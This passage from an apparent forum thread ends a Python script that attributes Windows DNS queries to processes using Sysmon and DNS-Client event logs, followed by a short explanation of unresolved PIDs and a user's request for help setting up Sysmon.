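]


def parse_rows(rows):
    """Decode the JSON `data` column once and parse the row timestamp."""
    return [{"source": r["source"], "eventid": r["eventid"],
             "time": datetime.fromisoformat(r["datetime"]),
             "data": json.loads(r["data"])["EventData"]} for r in rows]


def name_matches(query_name, domain):
    """True for the domain itself or any subdomain of it (case-insensitive)."""
    q, d = query_name.lower().rstrip("."), domain.lower().rstrip(".")
    return q == d or q.endswith("." + d)


def sysmon_dns_by_image(events, domain):
    """Sysmon Event ID 22: number of queries for `domain` per process image."""
    counts = Counter(e["data"]["Image"] for e in events
                     if e["source"] == SYSMON and e["eventid"] == 22
                     and name_matches(e["data"]["QueryName"], domain))
    return dict(counts)


def resolve_pid(events, pid, at):
    """Return the image of the latest Sysmon Event ID 1 for `pid` created at or
    before `at`, or None. Taking the latest creation handles PID reuse."""
    best = None
    for e in events:
        if (e["source"] == SYSMON and e["eventid"] == 1
                and int(e["data"]["ProcessId"]) == int(pid) and e["time"] <= at
                and (best is None or e["time"] > best["time"])):
            best = e
    return best["data"]["Image"] if best else None


def attribute_dnsclient(events, domain):
    """DNS-Client 3010 hits for `domain` as (time, pid, image or '<unresolved>')."""
    out = []
    for e in events:
        if (e["source"] == DNSCLIENT and e["eventid"] == 3010
                and name_matches(e["data"]["QueryName"], domain)):
            pid = int(e["data"]["ClientPID"])
            image = resolve_pid(events, pid, e["time"]) or "<unresolved>"
            out.append((e["time"].isoformat(), pid, image))
    return out


if __name__ == "__main__":
    events = parse_rows(SAMPLE_ROWS)
    print(sysmon_dns_by_image(events, "adservice.google.com"))
    for hit in attribute_dnsclient(events, "google.com"):
        print(hit)
```

    An unresolved PID usually means Sysmon was not yet installed when that process started, which is the situation Mike describes; pulling Event ID 1 history from before the query window fixes that.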

  • Hi

    I was finally able to visit this again. I can't get Sysmon to work. I ran the query you posted, and it worked!

    I think the Sysmon tool would be much better. Do you think we could work together to get my Sysmon working please?

    -Mike